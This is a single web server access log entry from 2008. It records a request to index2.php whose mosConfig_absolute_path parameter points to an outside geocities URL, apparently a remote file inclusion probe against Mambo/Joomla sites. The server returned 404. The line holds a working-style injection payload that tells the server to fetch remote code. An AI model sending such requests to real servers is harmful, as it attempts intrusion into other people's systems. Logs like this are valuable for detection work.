72.47.201.117 - - [23/May/2008:15:29:01 -0500] "GET //index2.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://www.geocities.com/koeluna/test.txt??? HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
